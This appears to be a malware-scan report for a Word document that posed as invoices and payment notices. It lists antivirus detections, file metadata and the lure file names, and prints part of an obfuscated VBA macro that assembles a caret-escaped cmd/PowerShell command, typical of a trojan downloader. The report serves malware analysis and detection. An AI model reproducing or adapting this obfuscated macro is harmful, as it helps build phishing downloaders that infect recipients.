Antivirus scan for bdd1a401cbc4ae5309e7e282ebb21194bbe126b114ea31a237c0fd22e2e73f7c at 2018-08-20 17:35:40 UTC

Antivirus	Result	Update
Emsisoft	Trojan-Downloader.Macro.Generic.H (A)	20180820
Endgame	malicious (high confidence)	20180730
ESET-NOD32	VBA/TrojanDownloader.Agent.KAI	20180820
Fortinet	VBA/Agent.JZV!tr.dldr	20180820
NANO-Antivirus	Trojan.Ole2.Vbs-heuristic.druvzi	20180820
Qihoo-360	virus.office.qexvmc.1070	20180820
TACHYON	Suspicious/W97M.Obfus.Gen	20180820
Tencent	Heur.Macro.Generic.Gen.f	20180820
TrendMicro-HouseCall	TROJ_FRS.VSN14H18	20180820
Zoner	Probably W97Obfuscated	20180819
Ad-Aware		20180820
AegisLab		20180820
AhnLab-V3		20180820
Alibaba		20180713
ALYac		20180820
Antiy-AVL		20180820
Arcabit		20180820
Avast		20180820
Avast-Mobile		20180820
AVG		20180820
Avira (no cloud)		20180820
AVware		20180820
Babable		20180725
Baidu		20180820
BitDefender		20180820
Bkav		20180820
CAT-QuickHeal		20180820
ClamAV		20180820
CMC		20180817
Comodo		20180820
CrowdStrike Falcon (ML)		20180202
Cybereason		20180308
Cylance		20180820
Cyren		20180820
DrWeb		20180820
eGambit		20180820
F-Prot		20180820
F-Secure		20180820
GData		20180820
Sophos ML		20180717
Jiangmin		20180820
K7AntiVirus		20180820
K7GW		20180820
Kaspersky		20180820
Kingsoft		20180820
Malwarebytes		20180820
MAX		20180820
McAfee		20180820
McAfee-GW-Edition		20180820
Microsoft		20180820
eScan		20180820
Palo Alto Networks (Known Signatures)		20180820
Panda		20180820
Rising		20180820
SentinelOne (Static ML)		20180701
Sophos AV		20180820
SUPERAntiSpyware		20180820
Symantec		20180820
Symantec Mobile Insight		20180814
TheHacker		20180818
TrendMicro		20180820
Trustlook		20180820
VBA32		20180820
VIPRE		20180820
ViRobot		20180820
Webroot		20180820
Yandex		20180818
ZoneAlarm by Check Point		20180820

The file being studied follows the Compound Document File format! More specifically, it is a MS Word Document file.

Commonly abused properties

The studied file makes use of macros, a macro is a series of commands and instructions that you group together as a single command to accomplish a task automatically. Macros are often abused to perform malicious tasks when working with a document.

May try to run other files, shell commands or applications.

Seems to contain deobfuscation code.

Summary

creation_datetime

2018-08-20 13:14:00

revision_number

author

Eshabenem-PC

page_count

last_saved

2018-08-20 13:14:00

word_count

template

Normal.dotm

application_name

Microsoft Office Word

character_count

code_page

Latin I

Document summary

line_count

characters_with_spaces

version

1048576

paragraph_count

code_page

Latin I

OLE Streams

[+] Root Entry

[+] \x01CompObj

[+] \x05DocumentSummaryInformation

[+] \x05SummaryInformation

[+] Macros/VBA/JwOjisIphab

[+] Macros/VBA/_VBA_PROJECT

[+] Macros/VBA/__SRP_0

[+] Macros/VBA/__SRP_1

[+] Macros/VBA/__SRP_2

[+] Macros/VBA/__SRP_3

[+] Macros/VBA/dir

[+] Macros/VBA/hRUqcQoBkNYFNI

[+] Macros/VBA/kRVAHCArdmdTno

[+] WordDocument

Macros and VBA code streams

[+] kRVAHCArdmdTno.bas Macros/VBA/kRVAHCArdmdTno 11067 bytes

obfuscated

Function cRPBonHMM()
On Error Resume Next
IsArray 50799 - mtwwZ / 82836 - YiDMim
   IsArray CDbl(biMHIl)
OQRfGp = "md  " + "/v^ ^" + " /r" + "   " + CStr(Chr(jMdnvXoNo + WEwvHvC + 34 + skLtFpoJzPwMZX + RVwHoPNBHw)) + " " + "Se" + "t^" + " ^  ^ R"
VarType 95611 * jCXKlB - HjSDZ / ucjQI
   HOzldP = Second(9724)
   HOzldP = Oct(716)
PdwcNJ = "M^E=^" + "p^ow" + "^e}^s" + "h^e^{^" + "{^ -^e"
HOzldP = SXDQH * SXzwU
   HOzldP = CCur(aNzCJb / WsBhS)
   IsArray CDate(9)
FfZCkEl = " ^JA^BR" + "A^" + "H^o" + "^A^SQ^A" + "^9^" + "A#4A" + "^ZQ^B3A" + "^\^0" + "^"
VarType 12881 - AKhjEm + kvpQvG * jEnICL
   HOzldP = bmaBNs / SvKMT
   HOzldP = CCur(756)
   HOzldP = wwaWVw * szQVzJ * 16884 + VbPRO
   VarType Second(4)
PiFzmuJMl = "AbwB" + "^i^" + "A^" + "#^oA^" + "ZQ^B^" + "jA"
HOzldP = 30936 - mTwTi
   IsArray Round(9)
   VarType Tan(84060868)
RWRClCL = "^H" + "Q" + "A," + "A^B^OA#" + "U^A^" + "dAA" + "^u^A" + "^" + "$c^AZ" + "^Q" + "^BiA" + "E^:^Ab^"
HOzldP = CDate(nawAZF * UowUk)
   IsArray Int(wiSLc)
   HOzldP = 98772 * nOWSp + sBlTo - asjVO
   VarType 29837 / VfPtXn + 99698 - SXzmVB
   VarType Tan(CfupS)
   IsArray CByte(55002 / VKkqZS)
pwJinLfMtw = "A^" + "B^p" + "^A" + "^#" + "^U^" + "Ab^" + "gB^0" + "^A" + ".^s"
VarType 6341 + CrJdJV
   HOzldP = nHwcv + TCjNU
   IsArray CDate(aDwzwh)
jJjMiEznhin = "^A" + "JAB^" + "%" + "A" + "$^,Ac^" + "wA^9A" + "\cA^aA" + "^" + "B0^" + "A"
cRPBonHMM = OQRfGp + PdwcNJ + FfZCkEl + PiFzmuJMl + RWRClCL + pwJinLfMtw + jJjMiEznhin
   IsArray Second(268)
   VarType CBool(8)
   HOzldP = 40593 - SKQOpd
   HOzldP = Rnd(DSOtXk + WtQjMv)
End Function
Function CliTiw()
On Error Resume Next
IsArray 45574 * uvBbA - Juiin * UvlFM
   VarType FarKt * 419 - zbrojK - wqsiGv
   HOzldP = CDate(XLOnBr)
JnDGwjYwkl = "^" + "HQAc^" + "A" + "^A^6^A" + "^\+^A" + "^L" + "^w^B^o" + "^A#" + "EA^" + "@g^B" + "h"
VarType 46557 / sLzuj / AkcsD / nXuEq
   VarType Str(35643 + 65442)
   HOzldP = Round(XkbrAC)
   HOzldP = Tan(19778 * YdilO)
sEqdVAzIO = "^AH,^A" + "^a^QB7" + "^ [... continues ...]

[+] JwOjisIphab.bas Macros/VBA/JwOjisIphab 259 bytes

run-file

ExifTool file metadata

SharedDoc

Author

Eshabenem-PC

HyperlinksChanged

System

Windows

LinksUpToDate

HeadingPairs

Title, 1

Identification

Word 8.0

Template

Normal.dotm

CharCountWithSpaces

CreateDate

2018:08:20 12:14:00

Word97

LanguageCode

English (US)

CompObjUserType

Microsoft Word 97-2003 Document

ModifyDate

2018:08:20 12:14:00

Characters

CodePage

Windows Latin 1 (Western European)

RevisionNumber

MIMEType

application/msword

Words

FileType

DOC

Lines

AppVersion

16.0

Security

None

Software

Microsoft Office Word

TotalEditTime

Pages

ScaleCrop

CompObjUserTypeLen

FileTypeExtension

doc

Paragraphs

LastPrinted

0000:00:00 00:00:00

DocFlags

Has picture, 1Table, ExtChar

File identification

MD5 9bcbb7623ef7eb3165710b7073be1c23

SHA1 56ffd29f6645aad78314b0dc483f43e7943dde03

SHA256 bdd1a401cbc4ae5309e7e282ebb21194bbe126b114ea31a237c0fd22e2e73f7c

ssdeep

1536:XptJlmrJpmxlRw99NBY+aSxUY+X24bELaKi:5te2dw99fLB+mi8Vi

File size 92.8 KB ( 94976 bytes )

File type MS Word Document

Magic literal

CDF V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Author: Eshabenem-PC, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Sun Aug 19 12:14:00 2018, Last Saved Time/Date: Sun Aug 19 12:14:00 2018, Number of Pages: 1, Number of Words: 5, Number of Characters: 33, Security: 0

TrID	Microsoft Word document (54.2%) Microsoft Word document (old ver.) (32.2%) Generic OLE2 / Multistream Compound File (13.5%)

VirusTotal metadata

First submission 2018-08-20 17:35:40 UTC ( 6 months ago )

Last submission 2018-08-20 17:35:40 UTC ( 6 months ago )

File names

SWIFT #972967VGQC.doc
Invoice.doc
BIZ #8369YDZV.doc
PAY #82552XIUHUHQ.doc
SEP #9791178VA.doc
PAY #2843684DYPNPA.doc
PAYMENT #3588142IJ.doc
PAYMENT #16TPEVGEG.doc
PAYMENT #41420OLYQC.doc
SWIFT #349B.doc
Review invoice required.doc
PAY #920PSEKIZ.doc
PAY #3493312ABCGZPGJ.doc
PAYMENT #6172261G.doc
SEP #130777RG.doc
PAYROLL #9133776SWRRXAI.doc

SHA256:	bdd1a401cbc4ae5309e7e282ebb21194bbe126b114ea31a237c0fd22e2e73f7c
File name:	Invoice.doc
Detection ratio:	10 / 57
Analysis date:	2018-08-20 17:35:40 UTC ( 6 months ago ) View latest

Ciphered bundle

Commonly abused properties

Summary

Document summary

OLE Streams

Macros and VBA code streams

ExifTool file metadata

File identification

VirusTotal metadata

Leave your comment...

Recover your password

Join VirusTotal Community

Sign in